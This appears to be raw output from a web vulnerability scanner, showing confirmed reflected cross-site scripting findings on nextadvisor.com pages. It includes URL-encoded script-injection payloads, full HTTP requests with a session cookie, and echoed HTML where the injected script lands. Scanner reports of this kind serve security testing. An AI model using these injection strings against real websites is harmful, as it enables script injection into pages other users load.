<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", diet reviews, online diet, glycemic index diet, low glycemic diet, low carb diet, best weight loss plan, weight loss plans, diet programs, best diet, lose weight, weight loss programs, meal delivery reviews, atkins diet" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/diet_services/index.php'"--></style></script><script>netsparker(0x0001DE)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001DE)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="script%3E.php" class='link_off'>Overview</a> <span class="nav_border">|</span> <a href="compare_diy.php">DIY Diets</a> <span class="nav_border">|</span> <a href="compare_meals.php">Meal Plan Diets</a> <span class="nav_border">|</span> <a href="/diet_services/taste_test.php">Taste Test</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/diets_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online Diet Programs FAQ</h1> <p>Frequently Asked Questions about Online Diet Programs</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online Diet Programs:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="diet_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-bl..
- /online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FA)%3C/script%3E

/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FA)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0001FA)</script>

Request

GET /online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dvd_rental_services/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5910
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dvd rental, movie downloads, movie download, online streaming, watch movies instantly, movie download service, online game rental, Netflix, Blockbuster, CinemaNow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dvd_rental_services/'"--></style></script><script>netsparker(0x0001FA)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0001FA)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="index.php">Overview</a> <span class="nav_border">|</span> <a href="compare.php">Compare All Services</a> <span class="nav_border">|</span> <a href="faqs.php">FAQ</a><span class="nav_border">|</span> <a href="../blog/">Blog</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--><script>function checkForm() { hideAllErrors(); var formIsValid = showErrorAndFocusIf('FieldData0', isEmpty, 'nameError') && showErrorAndFocusIf('FieldData2', isEmpty, 'emailError') && showErrorAndFocusIf('FieldData2', isAnInvalidEmail, 'emailError2') && showErrorAndFocusIf('FieldData1', isEmpty, 'questionError'); return formIsValid;}function showErrorAndFocusIf(fieldId, predicate, errorId) { var field = document.getElementById(fieldId); if (predicate(field)) { document.getElementById(errorId).style.display = 'inline'; if (field.select) { field.select(); } field.focus(); return false; } return true;}function isEmpty(field) { return field.value == '';}function isAnInvalidEmail(field) { var email = field.value; var ok = "1234567890qwertyuiop[]asdfghjklzxcvbnm.@-_QWERTYUIOPASDFGHJKLZXCVBNM"; for(i = 0; i < email.length; i++){ if(ok.indexOf(email.charAt(i)) < 0) { return true; } } re = /(@.*@)|(\.\.)|(^\.)|(^@)|(@$)|(\.$)|(@\.)/; re_two = /^.+\@(\[?)[a-zA-Z0-9\-\.]+\.([a-zA-Z]{2,4}|[0-9]{1,3})(\]?)$/; return re.test(email) || !re_two.test(email);}function hideAllErrors() { document.getElementById("nameError").style.display = "none" document.getElementById("emailError").style.display = "none" document.getElementById("emailError2").style.display = "none" document.getElementById("questionError").style.display = "none"}</script><!--Start Content--><div id="content" class="img_left"><!--Start Left Content--> <div id="left_content"> <div class="img_left"><img src="/images/category_icons/online_dvd_rental_services_icon.gif" alt="" /> </div> <h1 style="padding:5px 0px 5px 15px;"> Online DVD Rental FAQ</h1> <p>Frequently Asked Questions about Online DVD Rental</p> <ul class=""> </ul> <br> <div style="padding:5px; padding-top:1px; background:#eeffff; margin-right:10px;"> <span class="latest"><p><strong>Search our site for more information about Online DVD Rental:</strong></p></span> <form action="http://www.nextadvisor.com/answers.php" id="cse-search-box"> <div> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:10" /> <input type="hidden" name="ie" value="UTF-8" /> <input type="text" name="q" size="31" /> <input type="submit" name="sa" value="Search" /> </div> </form> </div> <div> <p>If you can't find the question you're looking for, you can ask it here. Due to volume, we aren't able to respond to every question, but we answer as many as we can on the NextAdvisor.com blog. <form onSubmit="return checkForm();" method="post" action="http://www.emailmeform.com/fid.php?formid=303001" name="form1"> <div> <p><label for="FieldData0"><strong>Name:</strong></label> <input type="text" name="FieldData0" id="FieldData0" value="" size="22" tabindex="1" /></p> </div> <div class="error" id="nameError"> Required: Please enter your name </div> <div> <p><label for="FieldData2"><strong>Email</strong> (will not be published)<strong>:</strong> </label><input type="text" name="FieldData2" id="FieldData2" value="" size="22" tabindex="2" /></p> </div> <div class="error" id="emailError"> Required: Please enter your email address </div> <div class="error" id="emailError2"> This doesn't look like a real email address, please check and reenter </div> <div> <p><label for="FieldData3"></label> <input type="hidden" name="FieldData3" value="online_dvd_rental_services"> <input type="hidden" name="FieldData4" value="blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blogcategory-blog201008Ne-blog20100831-blog20100831-blog20100831-blogcategory-blogcategory-blog20100914-blog20100914-blog20100916-blog20100916-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100914-blog20100917-blog20100917-blog20100914-blog20100916-blog20100916-blog20100916-blog20100916-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100917-blog20100917-blog20100917-blog20100920-blog20100920-blog20100917-blog20100920-blog20100921-blog20100921-blog20100921-blog20100921-blog20100920-blog20100921-blog20100922-blog20100922-blog20100923-blog20100923-blog20100921-blog20100922-blog20100922-blog20100922-blog20100922-blog20100923-blog20100923-blog20100927-blog20100923-blog20100927-blog20100923-blog2010Nets-blog2010-blog201009Ne-blog20100927-blog201009-blog2010Nets-blog20100927-blog20100927-blog201009Ne-blog20100927-blog20110415-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110415-blog20110415-blog20110415-blog20110418-blog20110415-blog20110418-blog20110418-blog20110419-blog20110419-blog20110418-blog20110418-blog20110418-blog20110419-blog20110418-blog20110419-blog20110419-blog20110419-blog20110419-blog20110419-blog20110420-blog20110419-blog20110420-blog20110420-blog20110420-blog20110421-blog20110421-blog20110420-blog20110420-blog20110421-blog20110421-blog20110422-blog20110421-blog20110422-blog20110422-blog20110421-blog20110422-blog201104Ne-blog201104-blog20110422-blog20110422-blog2011Nets-blog2011-blog2011Nets-blogNetspark-blog-blog201104Ne-blog20110422-blog20110422-blog20110422-blogNetspark-na_server-status_ordering38_alt_intro"> </div></p> <div> <p><label for="FieldData1"><strong>Your Question:</p></strong></label> <textarea name="FieldData1" id="FieldData1" cols="50" rows="5" tabindex="3"></textarea> <div class="error" id="questionError"> <p>Please type your question in the box</p> </div> </div> <input type="submit" class="btn" value="Submit Question" name="Submit"> </form> </div><p></div> <!--End Left Content--> <!--Start Right Content--> <div id="right_content_faq"> <!--Start Right Yellow Box--> <div id="box" style="margin-top:15px;"> <div id="box_top"> <div id="box_content"> <div class="box_text"> <div class="box_image"><a href="/link.php?kw=blog20100520-blog20100520-blog20100525-blog20100525-blog20100525-blog20100525-blog20100527-blog20100527-blog201005Ne-blog201005-blog20100527-blog20100527-blog20100604-blog20100604-blog20100604-blog20100604-blog201006Ne-blog201006-blog20100616-blog20100616-blog20100616-blog20100616-blog20100712-blog20100712-blog20100712-blog20100712-blog20100721-blog20100721-blog20100721-blog20100721-blog20100727-blog20100727-blog201007Ne-blog201007-blog20100727-blog20100727-blog20100812-blog20100812-blog20100812-blog20100812-blog20100816-blog20100816-blog20100816-blog20100816-blog20100817-blog20100817-blog20100817-blog20100817-blog20100826-blog20100826-blogcategory-blogcategory-blog20100826-blog20100826-blog20100224-blog20100224-blog20100224-blog20100224-blog20100225-blog20100225-blog20100225-blog20100225-blog20100226-blog20100226-blog201002Ne-blog201002-blog20100226-blog20100226-blog20100310-blog20100310-blog20100310-blog20100310-blog20100312-blog20100312-blog20100312-blog20100312-blog20100318-blog20100318-blog20100318-blog20100318-blog20100319-blog20100319-blog20100319-blog20100319-blog20100322-blog20100322-blog20100322-blog20100322-blog20100325-blog20100325-blog20100325-blog20100325-blog20100331-blog20100331-blog201003Ne-blog201003-blog20100331-blog20100331-blog20100402-blog20100402-blog20100402-blog20100402-blog20100406-blog20100406-blog20100406-blog20100406-blog20100413-blog20100413-blog20100413-blog20100413-blog20100419-blog20100419-blog201004Ne-blog201004-blog20100419-blog20100419-blog20100831-blog20100831-blog201008Ne-blog201008-blogcategory-blo..
- /online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000200)%3C/script%3E

/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000200)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3C..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x000200)</script>

Request

GET /online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php HTTP/1.1
Referer: http://www.nextadvisor.com/online_dvd_rental_services/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 03:57:19 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 5925
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title> - NextAdvisor.com</title><meta name="description" content=""/><meta name="keywords" content=", online dvd rental, movie downloads, movie download, online streaming, watch movies instantly, movie download service, online game rental, Netflix, Blockbuster, CinemaNow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/online_dvd_rental_services/index.php'"--></style></script><script>netsparker(0x000200)</script>.php" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" 